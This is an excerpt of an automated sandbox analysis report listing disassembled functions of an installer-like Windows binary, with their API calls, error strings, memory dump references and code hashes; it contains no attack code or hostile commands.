                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: _memcpy_s
                                                            • String ID: Failed to find variable.$Failed to parse condition '%ls' at position: %u$Failed to read next symbol.$condition.cpp
                                                            • API String ID: 2001391462-1605196437
                                                            • Opcode ID: 2dbd468593767580b4b6d955a452462c45a4e2ea9c7a6782e327eb6c18786fe7
                                                            • Instruction ID: 7e47fceec204c432216a4353726146ae09f0584bdf0450913d5470be753d002d
                                                            • Opcode Fuzzy Hash: 2dbd468593767580b4b6d955a452462c45a4e2ea9c7a6782e327eb6c18786fe7
                                                            • Instruction Fuzzy Hash: D611C8325C0214BBDB15296C9C86DD63A14FF16721F04C071F958ED39ADA72C910D6E3
                                                            Function 00879E16 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 00879E38
                                                            Strings
                                                            • Failed get file version., xrefs: 00879E78
                                                            • Failed to set variable., xrefs: 00879E97
                                                            • File search: %ls, did not find path: %ls, xrefs: 00879EA3
                                                            • Failed to format path string., xrefs: 00879E43
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: Failed get file version.$Failed to format path string.$Failed to set variable.$File search: %ls, did not find path: %ls
                                                            • API String ID: 3613110473-2458530209
                                                            • Opcode ID: 9859e7722df73aaba8786bce492d8852dc86102cfc63eb8ffabfb7e769d3c6fa
                                                            • Instruction ID: ad5bcc3fb460584ac66b3a47b8fd63f972b94e45c58599bef3d2169d3310bb16
                                                            • Opcode Fuzzy Hash: 9859e7722df73aaba8786bce492d8852dc86102cfc63eb8ffabfb7e769d3c6fa
                                                            • Instruction Fuzzy Hash: 39118137D40129BFCB02AAD88C42CEEBB78FF14754B108166F918E6325D6719E109B91
                                                            Function 0088820F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 66COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • CreateWellKnownSid.ADVAPI32(00000000,00000000,00000000,00000000,00000044,00000001,00000000,00000000,?,?,00888E17,0000001A,00000000,?,00000000,00000000), ref: 00888258
                                                            • GetLastError.KERNEL32(?,?,00888E17,0000001A,00000000,?,00000000,00000000,?,?,00000000), ref: 00888262
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateCreateErrorKnownLastProcessWell
                                                            • String ID: Failed to allocate memory for well known SID.$Failed to create well known SID.$cache.cpp
                                                            • API String ID: 2186923214-2110050797
                                                            • Opcode ID: 44f5bd09966183ecabb757a025d361b2a6facb25b6fa499b831cd1e9d440d77e
                                                            • Instruction ID: 7a327139ceaf3d517b01a3c8a6732d865d922ba61421664aaf142973e1003456
                                                            • Opcode Fuzzy Hash: 44f5bd09966183ecabb757a025d361b2a6facb25b6fa499b831cd1e9d440d77e
                                                            • Instruction Fuzzy Hash: 5001C232546A35EBD62176994C06E9B6A68FF81B70F11402AFD14FB240EFB4CD4056E6
                                                            Function 0089DDA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000003E8,000004FF), ref: 0089DDCE
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089DDF8
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0089DFC8,00000000,?,?,?,?,00000000), ref: 0089DE00
                                                            Strings
                                                            • Failed while waiting for download., xrefs: 0089DE2E
                                                            • bitsengine.cpp, xrefs: 0089DE24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessageMultipleObjectsPeekWait
                                                            • String ID: Failed while waiting for download.$bitsengine.cpp
                                                            • API String ID: 435350009-228655868
                                                            • Opcode ID: d366241b75be28edd4deb29a89ebb478be6767a553ca67d3851e6a99c0db6e51
                                                            • Instruction ID: 91debb4ca5374b0e130ef9e432ab925c5daca8cf094835b63d19e11a94e457e5
                                                            • Opcode Fuzzy Hash: d366241b75be28edd4deb29a89ebb478be6767a553ca67d3851e6a99c0db6e51
                                                            • Instruction Fuzzy Hash: 2A11CA73A4533577DA2066A99D49EDFBB9CFB04725F040225FD05FB280D6649D0086E9
                                                            Function 00875F2E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetComputerNameW.KERNEL32(?,00000010), ref: 00875F5C
                                                            • GetLastError.KERNEL32 ref: 00875F66
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ComputerErrorLastName
                                                            • String ID: Failed to get computer name.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 3560734967-484636765
                                                            • Opcode ID: 1208f6522eeace77e1c7ffc2335be8fd6cf23b45e3c62c40fc8fee7c194925c3
                                                            • Instruction ID: ce957c911bf5e4e785cfcb7f12c2faaf705043c48a83301102cf0453e54ed9a0
                                                            • Opcode Fuzzy Hash: 1208f6522eeace77e1c7ffc2335be8fd6cf23b45e3c62c40fc8fee7c194925c3
                                                            • Instruction Fuzzy Hash: 7611E933A41928ABC711EAA49C45ADEB7E8FB08720F114116FD04FB380DEB5EE0446E6
                                                            Function 008767AA Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?), ref: 008767E3
                                                            • GetLastError.KERNEL32 ref: 008767ED
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastPathTemp
                                                            • String ID: Failed to get temp path.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 1238063741-2915113195
                                                            • Opcode ID: f0c58d35212be8c94c63c21f41d3bbacfab74736c72aff4c36539f93e3f3564e
                                                            • Instruction ID: 914202b4cbbcfd9e0b3f16faa430c6341a476605588448c91f15c2d6d36255c9
                                                            • Opcode Fuzzy Hash: f0c58d35212be8c94c63c21f41d3bbacfab74736c72aff4c36539f93e3f3564e
                                                            • Instruction Fuzzy Hash: FF010872E416296BD620AB545C06FAE7758FB04710F104275FD18F7381FA74DD048AD7
                                                            Function 00875E94 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(?), ref: 00875EA6
                                                              • Part of subcall function 008B0ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00875EB2,00000000), ref: 008B0AE0
                                                              • Part of subcall function 008B0ACC: GetProcAddress.KERNEL32(00000000), ref: 008B0AE7
                                                              • Part of subcall function 008B0ACC: GetLastError.KERNEL32(?,?,?,00875EB2,00000000), ref: 008B0AFE
                                                              • Part of subcall function 008B3D1F: SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008B3D4C
                                                            Strings
                                                            • variable.cpp, xrefs: 00875ED0
                                                            • Failed to get 64-bit folder., xrefs: 00875EF0
                                                            • Failed to set variant value., xrefs: 00875F0A
                                                            • Failed to get shell folder., xrefs: 00875EDA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressCurrentErrorFolderHandleLastModulePathProcProcess
                                                            • String ID: Failed to get 64-bit folder.$Failed to get shell folder.$Failed to set variant value.$variable.cpp
                                                            • API String ID: 2084161155-3906113122
                                                            • Opcode ID: 81da14611abeba8b516120bd915c6c3ec6a3c5d8a440db35766701bd3d6824e3
                                                            • Instruction ID: 972843d29ccf5b9d062accaed6ac5e8684691d674574d89be3ff0c34bbead60f
                                                            • Opcode Fuzzy Hash: 81da14611abeba8b516120bd915c6c3ec6a3c5d8a440db35766701bd3d6824e3
                                                            • Instruction Fuzzy Hash: 8F016532941629BBDF12A794CC06BDE7A68FB00761F108165F808F6294DFB4DE409BD2
                                                            Function 008B4153 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 54fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 008B4440: FindFirstFileW.KERNEL32(0089923A,?,00000100,00000000,00000000), ref: 008B447B
                                                              • Part of subcall function 008B4440: FindClose.KERNEL32(00000000), ref: 008B4487
                                                            • SetFileAttributesW.KERNEL32(0089923A,00000080,00000000,0089923A,000000FF,00000000,?,?,0089923A), ref: 008B4182
                                                            • GetLastError.KERNEL32(?,?,0089923A), ref: 008B418C
                                                            • DeleteFileW.KERNEL32(0089923A,00000000,0089923A,000000FF,00000000,?,?,0089923A), ref: 008B41AC
                                                            • GetLastError.KERNEL32(?,?,0089923A), ref: 008B41B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: File$ErrorFindLast$AttributesCloseDeleteFirst
                                                            • String ID: fileutil.cpp
                                                            • API String ID: 3967264933-2967768451
                                                            • Opcode ID: 7065a24d764b1251cabfb08f379f0d6b97c0167324767f4fa2509697cac924ad
                                                            • Instruction ID: a05b7e26dec464464f9c5501c7878a6e7038bd97b08583768da0d27d9c7c2b85
                                                            • Opcode Fuzzy Hash: 7065a24d764b1251cabfb08f379f0d6b97c0167324767f4fa2509697cac924ad
                                                            • Instruction Fuzzy Hash: C7012272E4163AA7D7311AAE8C06BAB7EA8FF20760F010320FC14EA382D7618D9081D1
                                                            Function 0089DA05 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 0089DA1A
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 0089DA5F
                                                            • SetEvent.KERNEL32(?,?,?,?), ref: 0089DA73
                                                            Strings
                                                            • Failure while sending progress during BITS job modification., xrefs: 0089DA4E
                                                            • Failed to get state during job modification., xrefs: 0089DA33
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeave
                                                            • String ID: Failed to get state during job modification.$Failure while sending progress during BITS job modification.
                                                            • API String ID: 3094578987-1258544340
                                                            • Opcode ID: 2d76847914abf25384dbb0932d04e5f767548d2017f26b12865b8f360685fcde
                                                            • Instruction ID: 6a0c80ec2737571b2657a29796968f28ab6082355dfdaeadf4c73783979e1fd1
                                                            • Opcode Fuzzy Hash: 2d76847914abf25384dbb0932d04e5f767548d2017f26b12865b8f360685fcde
                                                            • Instruction Fuzzy Hash: 41019272A05725BFCB11EB59C859AAEB7ACFF14321B004246E805E7700D770ED14CAD9
                                                            Function 0089DC7E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(00000008,?,00000000,00000000,00000000,?,0089DDEE), ref: 0089DC92
                                                            • LeaveCriticalSection.KERNEL32(00000008,?,0089DDEE), ref: 0089DCD7
                                                            • SetEvent.KERNEL32(?,?,0089DDEE), ref: 0089DCEB
                                                            Strings
                                                            • Failed to get BITS job state., xrefs: 0089DCAB
                                                            • Failure while sending progress., xrefs: 0089DCC6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$EnterEventLeave
                                                            • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                            • API String ID: 3094578987-2876445054
                                                            • Opcode ID: 6fdf6010a00d37c42ec210369214d0b9f61ac785bc7c45d5bf22724be98f638e
                                                            • Instruction ID: 362ec5e57d134e30b09c6404629046217358ca337884e73d3b97e1f7089d83e9
                                                            • Opcode Fuzzy Hash: 6fdf6010a00d37c42ec210369214d0b9f61ac785bc7c45d5bf22724be98f638e
                                                            • Instruction Fuzzy Hash: 53012432A01725BFCB22AB59D849A9EB7ACFF04324B004256F904D7700DBB0ED04CBD8
                                                            Function 0089D7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0089DF52,?,?,?,?,?,?,00000000,00000000), ref: 0089D802
                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0089DF52,?,?,?,?,?,?,00000000,00000000), ref: 0089D80D
                                                            • GetLastError.KERNEL32(?,0089DF52,?,?,?,?,?,?,00000000,00000000), ref: 0089D81A
                                                            Strings
                                                            • Failed to create BITS job complete event., xrefs: 0089D848
                                                            • bitsengine.cpp, xrefs: 0089D83E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateCriticalErrorEventInitializeLastSection
                                                            • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                            • API String ID: 3069647169-3441864216
                                                            • Opcode ID: cffd1dedc35a47cbeb7c82f6da7ae7ba807bfdc5cf26d96ddbb88fe1c2d27816
                                                            • Instruction ID: c51e8573c67716095b45f5ebfb7c43f62c2ac138adbf1ce6c491257d17ec5e89
                                                            • Opcode Fuzzy Hash: cffd1dedc35a47cbeb7c82f6da7ae7ba807bfdc5cf26d96ddbb88fe1c2d27816
                                                            • Instruction Fuzzy Hash: E20152769417266BC710AB59DC05A86BBA8FF09760B054226FD18E7741D7B09800CBE5
                                                            Function 0087D4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4B7
                                                            • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0087D4C6
                                                            • LeaveCriticalSection.KERNEL32(000000D0,?,00887040,000000B8,00000000,?,00000000,75C0B390), ref: 0087D4DB
                                                            Strings
                                                            • userexperience.cpp, xrefs: 0087D4F4
                                                            • Engine active cannot be changed because it was already in that state., xrefs: 0087D4FE
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                            • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                            • API String ID: 3376869089-1544469594
                                                            • Opcode ID: 520267670a59ae8f674fe034ebff4524d91be42899fecf3b3f819873b9dbd4ba
                                                            • Instruction ID: 78b5c309dfc609c85fbb3faac549a392db2991a6c88f09c00d3d8c6613d9e8d8
                                                            • Opcode Fuzzy Hash: 520267670a59ae8f674fe034ebff4524d91be42899fecf3b3f819873b9dbd4ba
                                                            • Instruction Fuzzy Hash: B6F0C232340708AF97205EAADC84D9777BCFF95761300852AF615D7250DBB4EC098770
                                                            Function 008B1C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 008B1CB3
                                                            • GetLastError.KERNEL32(?,008749DA,00000001,?,?,00874551,?,?,?,?,00875466,?,?,?,?), ref: 008B1CC2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressErrorLastProc
                                                            • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                            • API String ID: 199729137-398595594
                                                            • Opcode ID: 81dd7b1c6f43bd29e2fa79530ff4dc27572ad97a416bf0a604e8e8af6d35d1b2
                                                            • Instruction ID: f9c7cabae1820e99e62af980508e819a3f51ed9ef599c13658b0bd70be6861b6
                                                            • Opcode Fuzzy Hash: 81dd7b1c6f43bd29e2fa79530ff4dc27572ad97a416bf0a604e8e8af6d35d1b2
                                                            • Instruction Fuzzy Hash: D701F237A8163693CA2126A96C3DB966B40FB20BA1F460233AD11EF360DB34DC40C6D6
                                                            Function 008A495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,008A490E,00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002), ref: 008A497D
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 008A4990
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,008A490E,00000000,?,008A48AE,00000000,008D7F08,0000000C,008A4A05,00000000,00000002), ref: 008A49B3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 27125ae6520ac513ea4d305c3a7dd0665d33e94fae0c7e95807378604209ee3a
                                                            • Instruction ID: 1c807282d4dc7abeac8da2da680a10ad37bdc97bcadeb61fd3efc0777e65c5e7
                                                            • Opcode Fuzzy Hash: 27125ae6520ac513ea4d305c3a7dd0665d33e94fae0c7e95807378604209ee3a
                                                            • Instruction Fuzzy Hash: 29F03C30A10608BBDF11AF94DC69BAEBFA8FF48711F444269F805E2260CBB54951CA95
                                                            Function 00889287 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 139COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32 ref: 008893C9
                                                              • Part of subcall function 008B56CF: GetLastError.KERNEL32(?,?,0088933A,?,00000003,00000000,?), ref: 008B56EE
                                                            Strings
                                                            • cache.cpp, xrefs: 008893ED
                                                            • Failed to find expected public key in certificate chain., xrefs: 0088938A
                                                            • Failed to read certificate thumbprint., xrefs: 008893BD
                                                            • Failed to get certificate public key identifier., xrefs: 008893F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast
                                                            • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                            • API String ID: 1452528299-3408201827
                                                            • Opcode ID: e41b1b1d20677b933c312a3e105d34fee39d5b913f7dd6d862dcec52d0b5b4a9
                                                            • Instruction ID: 9a2ff790156f75a8dd6637ecb70a7c3f26eee55c964c8c7ef2c777ee299a9943
                                                            • Opcode Fuzzy Hash: e41b1b1d20677b933c312a3e105d34fee39d5b913f7dd6d862dcec52d0b5b4a9
                                                            • Instruction Fuzzy Hash: 41414072A00619AFDB10EAA8C841EAEB7B8FB08714F055129FA55F7391D674ED00CBA1
                                                            Function 008721AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 008721F2
                                                            • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 008721FE
                                                              • Part of subcall function 00873BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BDB
                                                              • Part of subcall function 00873BD3: HeapSize.KERNEL32(00000000,?,008721CC,000001C7,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873BE2
                                                            Strings
                                                            Memory Dump Source
